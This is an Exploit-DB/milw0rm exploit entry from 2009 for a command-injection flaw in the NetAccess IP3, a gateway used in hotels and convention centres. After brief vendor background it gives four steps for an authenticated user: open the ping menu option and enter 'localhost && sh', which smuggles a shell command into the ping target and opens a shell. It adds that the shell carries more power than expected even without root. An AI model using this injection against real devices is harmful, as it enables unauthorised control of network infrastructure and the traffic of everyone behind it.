NetAccess IP3 - (Authenticated) Ping Option Command Injection

EDB-ID:

9688

Author:

r00t

Type:

local

Platform:

Hardware

Published:

2009-09-15

###############################################################
#NetAccess IP3 - Force into shell
#By: r00t
#Shouts: G., Tee, ES, s1ngl3, and D1g1t5
#
###############################################################
#Requirements: Remote access to an IP3
#              Any level control panel username/password
#
###############################################################
#Vendor Information:
#Thanks to Sebastian Wolfgarten (sebastian at wolfgarten dot com)
#for including vendor information in his AFD vuln
#
#"IP3's NetAccess is a device created for high demand environments such as
#convention centers or hotels. It handles the Internet access and
#provides for instance firewalling, billing, rate-limiting as well as
#various authentication mechanisms. The device is administrated via SSH
#or a web-based GUI."
#
###############################################################

1. SSH into the IP3's IP address
2. After logging in, select the "ping" option (usually menu item 5)
3. Ping the address: localhost && sh
4. After four pings to localhost, shell will be forced open

One may think there are limitations once logged into shell without
root access on an IP3.  Wrong.

# milw0rm.com [2009-09-15]